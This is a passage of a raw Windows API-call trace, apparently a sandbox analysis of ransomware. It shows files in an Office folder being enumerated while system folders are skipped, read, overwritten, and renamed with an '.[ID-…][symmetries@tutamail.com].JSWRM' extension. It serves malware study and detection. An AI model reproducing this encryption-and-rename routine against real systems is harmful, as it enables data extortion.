(lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.685] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2998) returned 1 [0132.685] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.685] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbb0, lpOverlapped=0x0) returned 1 [0132.713] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.713] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbb0, lpOverlapped=0x0) returned 1 [0132.713] CloseHandle (hObject=0x238) returned 1 [0132.713] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.715] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199e0c45, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199e0c45, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeef, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-black_scale-180.png", cAlternateFileName="GRA3AD~1.PNG")) returned 1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0132.715] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0132.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-180.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-180.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 39 [0132.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-180.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-180.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 39 [0132.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.716] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3823) returned 1 [0132.716] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.716] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xee0, lpOverlapped=0x0) returned 1 [0132.718] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.718] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xee0, lpOverlapped=0x0) returned 1 [0132.718] CloseHandle (hObject=0x238) returned 1 [0132.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.720] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199ba9ea, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199ba9ea, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x768, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-black_scale-80.png", cAlternateFileName="GR0C5F~1.PNG")) returned 1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0132.720] lstrcmpiW (lpString1="GrooveLogo.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0132.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-80.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-80.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 38 [0132.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-80.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-black_scale-80.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 38 [0132.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.721] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1896) returned 1 [0132.721] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.721] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0132.723] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.723] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0132.723] CloseHandle (hObject=0x238) returned 1 [0132.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.724] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199ba9ea, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199ba9ea, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x908, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-white_scale-100.png", cAlternateFileName="GRADA3~1.PNG")) returned 1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0132.724] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0132.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-100.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-100.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 39 [0132.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-100.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-100.png", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 39 [0132.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.725] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2312) returned 1 [0132.725] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.725] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x900, lpOverlapped=0x0) returned 1 [0132.727] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.727] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x900, lpOverlapped=0x0) returned 1 [0132.727] CloseHandle (hObject=0x238) returned 1 [0132.727] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.728] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199ba9ea, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199ba9ea, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc16, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-white_scale-140.png", cAlternateFileName="GR7FD5~1.PNG")) returned 1 [0132.728] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0132.728] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0132.728] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0132.728] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0132.728] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0132.728] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0132.729] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0132.729] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.729] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0132.729] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0132.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-140.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-140.png", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 39 [0132.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-140.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-140.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 39 [0132.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.730] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3094) returned 1 [0132.730] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.730] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc10, lpOverlapped=0x0) returned 1 [0132.731] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.731] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc10, lpOverlapped=0x0) returned 1 [0132.732] CloseHandle (hObject=0x238) returned 1 [0132.732] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.733] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199947e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199947e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19a06e8b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf5f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-white_scale-180.png", cAlternateFileName="GR2251~1.PNG")) returned 1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0132.733] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0132.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-180.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-180.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 39 [0132.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-180.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0132.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-180.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 39 [0132.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 